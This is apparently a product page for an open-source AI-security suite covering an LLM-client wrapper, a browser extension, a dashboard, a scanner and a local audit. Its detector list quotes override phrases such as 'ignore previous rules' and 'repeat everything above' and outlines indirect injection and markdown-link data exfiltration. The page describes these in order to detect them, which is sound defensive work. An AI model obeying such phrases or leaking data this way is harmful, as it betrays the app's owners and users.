Five products. One principle: only flag what's confirmable.
Lictor is an AI-security suite that meets your app at every layer it can be
watched honestly: at runtime while the model is answering,
in the browser against a live deployment, over time
on a dashboard, across the internet as a continuous scanner, and
in your editor as a local audit. Same rule everywhere: observe,
confirm, then report. Nothing attacks a live system; nothing leaves your machine
unless you choose to publish it.
Pick by where the risk lives. The first three guard your app; Patrol is the
internet-scale scanner pillar behind the in-the-wild disclosures; the CLI is the
pre-release audit you run before you ship.
Sentinel wraps your existing OpenAI or Anthropic client with a recursive
Proxy, so it sees calls at any depth
(client.chat.completions.create,
client.messages.create, and nested helpers) without you
rewriting a line of your own logic. Before a request leaves, it runs
pre-flight checks on the input text. After the model answers, it runs
post-flight checks on the output. Seven detectors total, the
same seven in both the npm and pip builds, so a Node service and a Python
worker behave identically.
Install is one line: you wrap() the client and keep using it
as before. Apache 2.0, and no telemetry: nothing about your prompts or
completions is sent anywhere.
Pre-flight detectors · run on the input
PRE-FLIGHT
prompt-injection
Catches a user trying to override your instructions ("ignore previous rules", role-swap, jailbreak framing) before it reaches the model.
PRE-FLIGHT
indirect-prompt-injection
The same attack hidden inside content your app pulled in (a RAG document, a fetched page, an email) carrying instructions into the prompt second-hand.
PRE-FLIGHT
secrets-in-input
Flags an API key, token or credential that's about to be shipped off to the model provider in the prompt, a leak you'd never see in your logs.
Post-flight detectors · run on the output
POST-FLIGHT
pii-leak
Catches the model handing back personal data (emails, phone numbers, IDs) in an answer that shouldn't contain it.
POST-FLIGHT
system-prompt-leak
Catches the model reciting your system prompt back to the user: the classic "repeat everything above" exfiltration.
POST-FLIGHT
output-exfil-sink
Catches model output that's trying to smuggle data out: a markdown image or link pointed at an attacker URL with your data in the query string.
OPT-IN
slopsquat-watch
Informational only. Notices when the model suggests a package name that doesn't exist, the seed of a slopsquatting attack. Off the blocking path by default; it never blocks unless you ask it to.
Install · one line, then nothing changes
# Node, npm
npm install @lictor/sentinel
// then wrap your client onceimport OpenAI from"openai";
import { wrap } from"@lictor/sentinel";
const client = wrap(new OpenAI());
// use `client` exactly as before; pre/post-flight checks run on every call
# Python, pip
pip install lictor-sentinel
# then wrap your client oncefrom anthropic import Anthropic
from lictor_sentinel import wrap
client = wrap(Anthropic())
# use `client` exactly as before; same 7 detectors as the npm build
Want to see what each detector maps to in the standards? The prompt-injection,
output-handling and exfiltration detectors line up with the
OWASP Top 10 for LLM apps in the coverage map.
Product 2 · browser extension · Lictor Shield
Audit the site you're actually looking at
Shield runs 10 checks against a deployed site: the real thing on the real
domain, not your source tree. It is observe-only: it reads what the
browser already has and makes a small number of plain requests, single-lane
at one request per second per host, always with
credentials: omit so it never rides your logged-in session.
The pattern-matching is done by a Rust core compiled to WASM, so the
heavy scanning happens locally in the page, fast, with no server round-trip.
The 10 live checks
CRITICAL
Secrets in HTML & JS
Key-shaped strings the live page ships in its markup or bundled scripts.
HIGH
AI-agent fingerprint
Detects when the site is fronted by an AI agent or assistant, the surface our runtime detectors guard.
CRITICAL
Exposed .env / .git
Config and version-control directories the deployment accidentally serves.
CRITICAL
Supabase / Firebase open
A backend reachable from the page with no security rules in front of it.
HIGH
Unauth API paths
API endpoints the front-end calls that answer without a login check.
HIGH
Admin paths
Admin or dashboard surfaces left reachable on the public deployment.
HIGH
CORS
Cross-origin settings permissive enough to let another site read responses.
MEDIUM
Security headers
Missing CSP / HSTS / nosniff and the headers a framework leaves off.
MEDIUM
Mixed content
HTTPS pages pulling assets over plain HTTP, a downgrade and tamper risk.
MEDIUM
Exposed source maps
Published .map files that hand an attacker your original source.
Shield holds itself to the same evidence bar as the audit. See
the false positives we filter for why a
bare 200 OK is never enough to call something exposed.
Product 3 · hosted dashboard · Lictor Guardian
The findings, gathered over time
Sentinel and Shield each tell you about a moment. Guardian is the place those moments
add up. It's a hosted dashboard and incident timeline that aggregates findings over
time, so you can see whether a problem is new, recurring, or finally resolved, and
tell that story to the people who ask. Free as a 90-day preview.
Incident timeline
Findings laid out in order: when each first appeared, when it changed, when it cleared.
Aggregated over time
One view across runs and sources, so a recurring issue reads as a pattern, not a surprise.
Free 90-day preview
Try the whole timeline for 90 days at no cost while the dashboard is in preview.
Patrol is the internet-scale scanner pillar. It starts with passive recon
(what's already public, gathered without touching the target) and adds a
precision-gated active tier that confirms a narrow set of high-signal
exposures. Every finding, passive or active, passes through a central verify
gate before it is ever reported. Until a human confirms it, a finding is
SUSPECTED, never asserted. Disclosure is ethical and observe-only:
Patrol looks, it does not break in.
The precision-gated active tier
These are the exposures the active tier confirms: each one observable from the outside, none requiring an attack.
CRITICAL
Exposed configs
Config files a deployment serves to the open internet.
CRITICAL
Open buckets
World-readable object storage with contents anyone can list.
HIGH
CORS
Cross-origin policies loose enough to leak authenticated responses.
HIGH
Subdomain takeovers
Dangling DNS pointed at a service that can be claimed.
CRITICAL
Leaked keys
Live credentials exposed in public surfaces, confirmed before report.
VERIFY GATE
SUSPECTED until verified
Nothing is reported as fact until a human clears the central verify gate.
Four slash commands, all 100% local: no token, no signup, no
telemetry. They read your code and explain what they find in plain English. The
headline command is the 48-check audit documented in full on the
coverage page.
/lictor-security-check
The 48-check pre-release audit. Detects the stack, runs every applicable check, writes a plain-English SECURITY-AUDIT.md.
/lictor-explain
Takes any finding or jargon-heavy warning and rewrites it as something a non-technical founder can act on.
/lictor-fix-it
Walks the findings one at a time, shows the proposed change, and applies it only with your explicit OK.
/lictor-rotate
Step-by-step, provider-specific rotation of a leaked key: the exact URL, the exact button, and how to confirm it worked.
Usage
# run the full 48-check audit on the current project
/lictor-security-check
# confused by a finding? get it in plain English
/lictor-explain
# apply the fixes, one at a time, with your approval
/lictor-fix-it
# a key leaked? rotate it, provider by provider
/lictor-rotate
Every product only reports what it can confirm by reading code or observing what's
already public, never by attacking a live system. Sentinel guards calls without
touching your prompts' contents off-box; Shield stays single-lane and credential-less;
Patrol holds findings at SUSPECTED until a human verifies them;
the CLI runs entirely on your machine. A scanner that cries wolf is worse than none,
so the same evidence bar runs through all of it.
Here are the false positives we filter.
Open-source. Apache 2.0. No telemetry.
Read the code before you trust it, install only the pieces you need, and run the audit
on your own machine. Start with the 48-check audit, or wrap your model client today.